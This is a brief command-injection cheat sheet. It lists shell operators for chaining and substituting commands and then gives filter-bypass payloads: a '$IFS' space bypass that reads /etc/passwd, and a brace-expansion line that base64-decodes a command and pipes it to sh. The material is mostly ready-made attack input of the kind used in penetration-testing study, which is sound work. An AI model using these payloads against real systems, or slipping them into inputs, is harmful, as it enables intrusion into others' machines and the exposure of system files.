Command Injection
Chaining and Invoking
; # Executes one command and then another
& # Executes a command in the background, followed by the other one
| # Redirects the output the first command as input to the second command
&& # Executes the second command if the first command succeeds
|| # Executes the second command if the first command fails$(command) # Both windows and linux systems
`command` # Only linux systemsBypasses
Space Bypass
cat$IFS/etc/passwd# Only works in bash
{echo,Y2F0IC9ldGMvcGFzc3dk}|{base64,-d}|sh